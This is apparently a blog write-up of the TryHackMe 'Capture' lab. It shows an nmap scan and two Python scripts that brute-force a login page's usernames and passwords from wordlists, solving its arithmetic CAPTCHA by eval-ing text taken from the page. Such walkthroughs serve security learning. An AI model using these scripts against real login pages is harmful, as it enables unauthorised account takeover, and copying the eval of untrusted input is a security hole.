Capture Writeup - Tryhackme

ยท

2 min read

๐Ÿ‘‹ Introduction

Hi there!, Capture is a room created by Toxicat0r in TryHackme Rated as Easy . Its actually quite simple if you know scripting. Without Further Ado lets Start!

๐Ÿ” Enumeration

As always we do, let's use nmap to find the open ports
nmap 10.10.221.12 -vv.

The results show just one open port - 80
Download the taskfiles, and we see two files usernames.txt and passwords.txt
indicating brute-force attack.

The exploitation is fairly easy and involves creating a script to bruteforce the login page But the page has rate limiting in place and requires us to solve CAPTCHA.

My solution to username Enumeration in python ( using Regex ):

#!/usr/bin/env python3

import requests
import re

url = "http://10.10.88.108/login"

with open("usernames.txt", "r") as f:
    usernames = [i.strip() for i in f.readlines()]

print("[+] Usernames extracted !")

for username in usernames:
    data = {"username": username, "password": "asdasd"}
    r = requests.post(url, data=data)

    if "Captcha enabled" in r.text:
        exp = re.search(r'([0-9]+)\s*([+\-*/])\s*([0-9]+)', r.text).group(0)
        result = eval(exp)
        data2 = {"username": username, "password": "asdasd", "captcha": result}
        r2 = requests.post(url, data=data2)

        if "does not exist" in r2.text:
            print("[!] Invalid: " + username)

        elif "Invalid captcha" in r2.text:
            print("[!] Captch failed")

        else:
            print("Username found : ", username)
            break

After some minutes of patience, found the username. Password enumeration:

#!/usr/bin/env python3

import requests
import re

url = "http://10.10.88.108/login"

with open("passwords.txt", "r") as f:
    passwords = [i.strip() for i in f.readlines()]

print("[+] Passwords extracted !\n")

for password in passwords:
    data = {"username": "natalie", "password": password}
    r = requests.post(url, data=data)

    if "Captcha enabled" in r.text:
        exp = re.search(r'([0-9]+)\s*([+\-*/])\s*([0-9]+)', r.text).group(0)
        result = eval(exp)
        data2 = {"username": "natalie", "password": password, "captcha": result}
        r2 = requests.post(url, data=data2)

        if "Invalid password" in r2.text:
            print("[!] Invalid natalie : " + password)
        elif "Invalid captcha" in r2.text:
            print("[!] Captcha failed")
        else:
            print("password Found : ", password)
            break

After running both one after another, we get both username and password!, login to get the flag!

ย